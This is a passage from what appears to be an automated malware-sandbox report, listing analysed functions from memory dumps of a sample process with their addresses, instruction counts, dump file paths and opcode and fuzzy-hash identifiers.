                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: bb2494ec1510700a8873a57b4b5d8811891742ff83e49d496bd57a2a49b4fe02
                                                                                                                                                          • Instruction ID: 8e6e35059b5e0d8c7b3dc4fd2231ae0786917fc7310cd578f769c870c9495df6
                                                                                                                                                          • Opcode Fuzzy Hash: bb2494ec1510700a8873a57b4b5d8811891742ff83e49d496bd57a2a49b4fe02
                                                                                                                                                          • Instruction Fuzzy Hash: C9E06DF2C602099FC740DF68C84966ABBF0FF08200F108465C418E7310D77496048F90
                                                                                                                                                          Function 0723BFB5 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000009.00000002.1843336136.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_9_2_7230000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 0d0177acd019d5cb9c5e56a713e39fe553a3b060894208809ff4a59b006acf82
                                                                                                                                                          • Instruction ID: fe075416348e7e13ac32bb4b31855748a012582e91d25d69f22ac7558c60d0f2
                                                                                                                                                          • Opcode Fuzzy Hash: 0d0177acd019d5cb9c5e56a713e39fe553a3b060894208809ff4a59b006acf82
                                                                                                                                                          • Instruction Fuzzy Hash: 71E026BAA25204CFC304DF64E4844E8BB75FF8B202F0010EAE60AD7222CB319D04CF10
                                                                                                                                                          Function 07235FBD Relevance: .0, Instructions: 20COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000009.00000002.1843336136.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_9_2_7230000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 2e71071a7d8b00bbb70db5c012ab4e6c385cc938bc2c14556b067a76f8a9999e
                                                                                                                                                          • Instruction ID: 8e12d9e46e759950b4c589f113d7e6369b4e31b774d786053f200a5f82f987ef
                                                                                                                                                          • Opcode Fuzzy Hash: 2e71071a7d8b00bbb70db5c012ab4e6c385cc938bc2c14556b067a76f8a9999e
                                                                                                                                                          • Instruction Fuzzy Hash: 6FD0C2B7C10028878B109AE5DD061EFFE30EB04611B414512E905A7600D27047248BC0
                                                                                                                                                          Function 07234E90 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000009.00000002.1843336136.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_9_2_7230000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: f5ca03bd81837f8696103a15750b55c64339e01738f25f33abcf324470d99009
                                                                                                                                                          • Instruction ID: 27278337b55fc66ce8c18af376336babe96a1b136fd12e040655c898e5acb189
                                                                                                                                                          • Opcode Fuzzy Hash: f5ca03bd81837f8696103a15750b55c64339e01738f25f33abcf324470d99009
                                                                                                                                                          • Instruction Fuzzy Hash: 1DE08CF4829189ABCB00EFA4C4046AD7AF4AB01200F504698D40553240DB704A449A82
                                                                                                                                                          Function 0723B6F8 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000009.00000002.1843336136.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_9_2_7230000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 58a9da42692af91b542632c7cca427221886e4251ea8ab78f3556188425ebfaa
                                                                                                                                                          • Instruction ID: f023b29ca1e8a51ff467ef892df21305514280fb68ed6ca7795de03997a76c1e
                                                                                                                                                          • Opcode Fuzzy Hash: 58a9da42692af91b542632c7cca427221886e4251ea8ab78f3556188425ebfaa
                                                                                                                                                          • Instruction Fuzzy Hash: ADE092F1D602099FD740EFA9C949A5EBBF0EB08600F1185A9D019E7211E7B49A058F91
                                                                                                                                                          Function 07235FC8 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000009.00000002.1843336136.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_9_2_7230000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: fcc788c89ca91730e34b729ea8219a5e8389f3dd18a4f57a8284d2c23dda9339
                                                                                                                                                          • Instruction ID: 8e9445f514292b1f9e043b22dd3aa92c3814549755b8465f1fbe19196f41cce5
                                                                                                                                                          • Opcode Fuzzy Hash: fcc788c89ca91730e34b729ea8219a5e8389f3dd18a4f57a8284d2c23dda9339
                                                                                                                                                          • Instruction Fuzzy Hash: 8DD09EB2D10139978B10AFE9DC054DFFF79EF05A50F418126E919A7100D3715A21DBD1
                                                                                                                                                          Function 0723A2A1 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000009.00000002.1843336136.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_9_2_7230000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 8888c85eddb5b2bafff2c64097f79806d0a3c3de2933a1b04e2c61078b8a5af3
                                                                                                                                                          • Instruction ID: dc4e653ce6b112072064aee8bce0b9eee7b3b761c2d8f1b35163e9d47213af34
                                                                                                                                                          • Opcode Fuzzy Hash: 8888c85eddb5b2bafff2c64097f79806d0a3c3de2933a1b04e2c61078b8a5af3
                                                                                                                                                          • Instruction Fuzzy Hash: 0DD012710A2A0947D3182796FE4F7987BB8D70621BF4C8021B10DA0551DEA998488F71
                                                                                                                                                          Function 072355D0 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000009.00000002.1843336136.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_9_2_7230000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: d36eb2c17cbd9a5dc95529552a60e959ad07b0f9c12af6de9f9f847fe18ed3aa
                                                                                                                                                          • Instruction ID: 544d1e38279e6229a0a4d7696ce028f73469f3a6fd21e1191ab8496cc0e98224
                                                                                                                                                          • Opcode Fuzzy Hash: d36eb2c17cbd9a5dc95529552a60e959ad07b0f9c12af6de9f9f847fe18ed3aa
                                                                                                                                                          • Instruction Fuzzy Hash: 5FC0127B054444AEE240A600CC0EBB177A8EBA4300F448853A840CA030CA22A91CAA29
                                                                                                                                                          Function 0723AE3B Relevance: .0, Instructions: 13COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000009.00000002.1843336136.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_9_2_7230000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 36f9f4f1371d8851c381949837a2dd4e62d77007503ab5167f46568b8fe9dcec
                                                                                                                                                          • Instruction ID: 1715eed127fef3fd0b853eba56107140f8337f5e57cec4929b12b08b41fea0c4
                                                                                                                                                          • Opcode Fuzzy Hash: 36f9f4f1371d8851c381949837a2dd4e62d77007503ab5167f46568b8fe9dcec
                                                                                                                                                          • Instruction Fuzzy Hash: 2CD0C9B447A206CFC7448F74904A4BA7AB8FB0A713B1094B9A00AE5211CB7595408F81
                                                                                                                                                          Function 0723A2B0 Relevance: .0, Instructions: 10COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000009.00000002.1843336136.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_9_2_7230000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: c676ad5708edff86f7e4d9644e796d0f12d632efaf2186a58cc7ffe799fb3dfb
                                                                                                                                                          • Instruction ID: 80c4203af49b35cdb7165b6827f6232d5198577b95a060e0b504c305430ff8f8
                                                                                                                                                          • Opcode Fuzzy Hash: c676ad5708edff86f7e4d9644e796d0f12d632efaf2186a58cc7ffe799fb3dfb
                                                                                                                                                          • Instruction Fuzzy Hash: D6C08CB00A170987C3082BA6FA0EBA87EE89705206F048020B109204505EA28844CEA1
                                                                                                                                                          Function 072358E4 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000009.00000002.1843336136.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_9_2_7230000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 8ff3f8d4c755f3644a0c8b5905899560aebb74dd1ff51dbc0bb55e3369ad295c
                                                                                                                                                          • Instruction ID: 257435bb66ef848e834b576be9c8f93a619e5471fd57fcdfe29f373a6ebde421
                                                                                                                                                          • Opcode Fuzzy Hash: 8ff3f8d4c755f3644a0c8b5905899560aebb74dd1ff51dbc0bb55e3369ad295c
                                                                                                                                                          • Instruction Fuzzy Hash: B5B012F51B9204F2A6046BB44DC0B7F5411EBB3710F409C02368802040CAA18434EA6B

                                                                                                                                                          Executed Functions

                                                                                                                                                          Function 01596FC8 Relevance: 6.8, Strings: 5, Instructions: 512COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: (ofq$(ofq$(ofq$,jq$,jq
                                                                                                                                                          • API String ID: 0-4008750692
                                                                                                                                                          • Opcode ID: 67e9e7635871eb5d3be022a5a56dc3956ec80d62aef0bd77b3b2258940ba9d52
                                                                                                                                                          • Instruction ID: e2184177db58b21cd6098e682bd22a35cab79a89ead582190a33befe7f99268f
                                                                                                                                                          • Opcode Fuzzy Hash: 67e9e7635871eb5d3be022a5a56dc3956ec80d62aef0bd77b3b2258940ba9d52
                                                                                                                                                          • Instruction Fuzzy Hash: C3224870A10209DFDF55CF69C884AAEBBF6BF88310F15846AE9199B261D734EC41CF52
                                                                                                                                                          Function 0159C146 Relevance: 6.5, Strings: 5, Instructions: 232COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 0omp$Ljmp$Ljmp$PHfq$PHfq
                                                                                                                                                          • API String ID: 0-524576615
                                                                                                                                                          • Opcode ID: bb8b89e997a28d0b0de03a035f324977a430e96835884275686aeb2c17f5c20c
                                                                                                                                                          • Instruction ID: db458814d3eecc72ca19345695ff83947abbf50be2770170db2d343cc20f8f89
                                                                                                                                                          • Opcode Fuzzy Hash: bb8b89e997a28d0b0de03a035f324977a430e96835884275686aeb2c17f5c20c
                                                                                                                                                          • Instruction Fuzzy Hash: 3CA1E875E00258CFDF14CFA9D984A9DBBF2BF89310F15806AE809AB361DB349941CF51
                                                                                                                                                          Function 01595362 Relevance: 6.4, Strings: 5, Instructions: 195COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 0omp$Ljmp$Ljmp$PHfq$PHfq
                                                                                                                                                          • API String ID: 0-524576615
                                                                                                                                                          • Opcode ID: c1d9b74ee3c13922ca3feb3e99e50d612c99b915c142cc675e6c158fbd3983da
                                                                                                                                                          • Instruction ID: 95380d86099df0cfc5cdd7708fe153680ceceb735827e6af73e837501fbe245b
                                                                                                                                                          • Opcode Fuzzy Hash: c1d9b74ee3c13922ca3feb3e99e50d612c99b915c142cc675e6c158fbd3983da
                                                                                                                                                          • Instruction Fuzzy Hash: 0091E874E00218CFDB55CFA9D984A9DBBF2FF89300F15906AE809AB365EB349845CF11
                                                                                                                                                          Function 0159C468 Relevance: 6.4, Strings: 5, Instructions: 187COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 0omp$Ljmp$Ljmp$PHfq$PHfq
                                                                                                                                                          • API String ID: 0-524576615
                                                                                                                                                          • Opcode ID: 1447e90bec85e5d77175f7c5f8ea34519ff894b8781dd035ba06126884df68b6
                                                                                                                                                          • Instruction ID: 59617f674cd23464893331d95a724cc670f3fe74ba0b2a03c755b9aedb55e096
                                                                                                                                                          • Opcode Fuzzy Hash: 1447e90bec85e5d77175f7c5f8ea34519ff894b8781dd035ba06126884df68b6
                                                                                                                                                          • Instruction Fuzzy Hash: DD81C374E00218CFDF14DFA9D984A9DBBF2BF89300F159069E819AB365DB349881CF51
                                                                                                                                                          Function 0159CA08 Relevance: 6.4, Strings: 5, Instructions: 187COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 0omp$Ljmp$Ljmp$PHfq$PHfq
                                                                                                                                                          • API String ID: 0-524576615
                                                                                                                                                          • Opcode ID: f966fa163f7036a177a0f83fccad240a6cdfc55dc0d5fb0e5dc7470aa5100f4d
                                                                                                                                                          • Instruction ID: faa10933cfa656304c0a5fcf7437d3a157e6431f99a75983f2896d257d6e1fbc
                                                                                                                                                          • Opcode Fuzzy Hash: f966fa163f7036a177a0f83fccad240a6cdfc55dc0d5fb0e5dc7470aa5100f4d
                                                                                                                                                          • Instruction Fuzzy Hash: 7281B374E00258CFDB54DFAAD994A9DBBF2BF89300F14C069E819AB365DB349881CF51
                                                                                                                                                          Function 0159D278 Relevance: 6.4, Strings: 5, Instructions: 186COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 0omp$Ljmp$Ljmp$PHfq$PHfq
                                                                                                                                                          • API String ID: 0-524576615
                                                                                                                                                          • Opcode ID: 7ab6d060ae83b353b07f95a824f2ff92939a599acef2cdd9f2512d799590edbb
                                                                                                                                                          • Instruction ID: 37055c2456ea1829d2619d0bbb0175b5d268a6acc1599a80f93a0d403d39d8ca
                                                                                                                                                          • Opcode Fuzzy Hash: 7ab6d060ae83b353b07f95a824f2ff92939a599acef2cdd9f2512d799590edbb
                                                                                                                                                          • Instruction Fuzzy Hash: D481B374E00218CFDB54DFAAD984A9DBBF2BF89300F14C069E819AB365DB749985CF11
                                                                                                                                                          Function 0159CCD8 Relevance: 6.4, Strings: 5, Instructions: 186COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 0omp$Ljmp$Ljmp$PHfq$PHfq
                                                                                                                                                          • API String ID: 0-524576615
                                                                                                                                                          • Opcode ID: 8def5c2354b904fde1d08dfbb66ba5e273fb36ddfe2e8b38df3feb2a4b19671b
                                                                                                                                                          • Instruction ID: 1e25f3710a84040787cc191b68f50fd226ac2c62c89258231b74632d80730180
                                                                                                                                                          • Opcode Fuzzy Hash: 8def5c2354b904fde1d08dfbb66ba5e273fb36ddfe2e8b38df3feb2a4b19671b
                                                                                                                                                          • Instruction Fuzzy Hash: 9C81B274E00218CFDB54CFAAD984A9DBBF2BF89300F14D069E819AB365DB349985CF51
                                                                                                                                                          Function 0159C738 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 0omp$Ljmp$Ljmp$PHfq$PHfq
                                                                                                                                                          • API String ID: 0-524576615
                                                                                                                                                          • Opcode ID: 880d0a216aa538bba0d96f1c10bfc3f08f58a1827ff67c8a87c487de310630bb
                                                                                                                                                          • Instruction ID: c966a04bfd5ffcf02af5dbdd8c52bf335ce9485fa7d3ee2900ad3c1929b92c05
                                                                                                                                                          • Opcode Fuzzy Hash: 880d0a216aa538bba0d96f1c10bfc3f08f58a1827ff67c8a87c487de310630bb
                                                                                                                                                          • Instruction Fuzzy Hash: 4C81B474E00218CFDB54CFAAD994A9DBBF2BF89310F14C069E819AB365DB349981CF51
                                                                                                                                                          Function 0159CFAA Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: 0omp$Ljmp$Ljmp$PHfq$PHfq
                                                                                                                                                          • API String ID: 0-524576615
                                                                                                                                                          • Opcode ID: e5a29bcd35d1353203d7847efdfc459832380733984dd93dc0ac228a419a9100
                                                                                                                                                          • Instruction ID: a0f7987aac261df6a6e55b2c4669fcb2b538f1ec848dc4d5c21504b5418d2c41
                                                                                                                                                          • Opcode Fuzzy Hash: e5a29bcd35d1353203d7847efdfc459832380733984dd93dc0ac228a419a9100
                                                                                                                                                          • Instruction Fuzzy Hash: 9181D375E00218CFDF14DFAAD984A9DBBF2BF89300F148069E819AB365DB349981DF11
                                                                                                                                                          Function 01599DE0 Relevance: 6.1, Strings: 4, Instructions: 1137COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: (ofq$4'fq$4'fq$4'fq
                                                                                                                                                          • API String ID: 0-1260671024
                                                                                                                                                          • Opcode ID: ef6441fe7afce0eb638ee536dcb6e6b2221d5117ca088b70b8193238ff40ec32
                                                                                                                                                          • Instruction ID: 787b2b9268230f42aea39b6452e55af18dca11486686c52bbabb6521337510d8
                                                                                                                                                          • Opcode Fuzzy Hash: ef6441fe7afce0eb638ee536dcb6e6b2221d5117ca088b70b8193238ff40ec32
                                                                                                                                                          • Instruction Fuzzy Hash: 90A28D71A002098FCF16CF68C584AAEBBF2FF88310F158569E415DF266D775E885CB62
                                                                                                                                                          Function 015929EC Relevance: 5.3, Strings: 4, Instructions: 338COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Xjq$Xjq$Xjq$Xjq
                                                                                                                                                          • API String ID: 0-2725347807
                                                                                                                                                          • Opcode ID: 229e4f627c316e0e39da89d3bf6a5d4504333a239a8a02931b15a4cb0a447d37
                                                                                                                                                          • Instruction ID: 7243e0c156e4171da907d064251c992d582866fd5c0f1298114f6f244937ce6d
                                                                                                                                                          • Opcode Fuzzy Hash: 229e4f627c316e0e39da89d3bf6a5d4504333a239a8a02931b15a4cb0a447d37
                                                                                                                                                          • Instruction Fuzzy Hash: 27B1E332E043198FDFA58F78D4552AEBBB2FF84320F20456EC455AB281DB749D46CB92
                                                                                                                                                          Function 015969A0 Relevance: 3.0, Strings: 2, Instructions: 515COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: (ofq$Hjq
                                                                                                                                                          • API String ID: 0-2051923243
                                                                                                                                                          • Opcode ID: 5ccf8843b62f3185577e5fc91133cc7c7ec8a588c04eb5f3b3cc52ef6eaa4e8b
                                                                                                                                                          • Instruction ID: 8c41c1eb98daedeefa0953b7a23bc844d5942e33f1b968800ba65ebd8b02a44c
                                                                                                                                                          • Opcode Fuzzy Hash: 5ccf8843b62f3185577e5fc91133cc7c7ec8a588c04eb5f3b3cc52ef6eaa4e8b
                                                                                                                                                          • Instruction Fuzzy Hash: 9012AB71A002198FDB14DF69C894BAEBBF6BF88300F208469E9159F395DF349D85CB91
                                                                                                                                                          Function 01593E09 Relevance: 2.9, Strings: 2, Instructions: 435COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Xjq$$fq
                                                                                                                                                          • API String ID: 0-4072599570
                                                                                                                                                          • Opcode ID: 08b37d1aad2e2543ace21b6492f61a21acc836e90e2379edf3b37dec89217b4b
                                                                                                                                                          • Instruction ID: 918ad64d90902410bfc42598b4e35c6d8997dd30ae568a2d0c962a7230eebff6
                                                                                                                                                          • Opcode Fuzzy Hash: 08b37d1aad2e2543ace21b6492f61a21acc836e90e2379edf3b37dec89217b4b
                                                                                                                                                          • Instruction Fuzzy Hash: C2F15A74E04219CFDB58DFB8D9545AEBBF2FF88310B14856AE506AB398CB359C02CB51
                                                                                                                                                          Function 01593B95 Relevance: 2.7, Strings: 2, Instructions: 215COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID: Xjq$Xjq
                                                                                                                                                          • API String ID: 0-958142700
                                                                                                                                                          • Opcode ID: d36d85b4939a6b702378cbfc54f0a2363ee14ba83fbe7bcc59dea6c5ea77cdcf
                                                                                                                                                          • Instruction ID: 494650fa4e21c2cfc465cf2f493dfa78128f677235beda11a0f4cb21f2c4dadf
                                                                                                                                                          • Opcode Fuzzy Hash: d36d85b4939a6b702378cbfc54f0a2363ee14ba83fbe7bcc59dea6c5ea77cdcf
                                                                                                                                                          • Instruction Fuzzy Hash: AA510832755351CFDB998A79A8A52BA7BB2BB81370B14446FC806CF381DB78CC468753
                                                                                                                                                          Function 0159E97A Relevance: .2, Instructions: 150COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 6faad7aa64cb58ff5babf6467a285513a1f34605670eb147e2c0e1fb3c5708a9
                                                                                                                                                          • Instruction ID: 41a4d29dce1c049eebf2b6d038b70eea0a4705fb7cceb87f1e0dffd6ad1ab3b3
                                                                                                                                                          • Opcode Fuzzy Hash: 6faad7aa64cb58ff5babf6467a285513a1f34605670eb147e2c0e1fb3c5708a9
                                                                                                                                                          • Instruction Fuzzy Hash: C851A575E00208DFDB18DFBAD494AADBBB2FF89300F24912AE915AB364DB355841CF11
                                                                                                                                                          Function 0159E988 Relevance: .1, Instructions: 147COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000D.00000002.4159649468.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_13_2_1590000_fahKSvwo.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
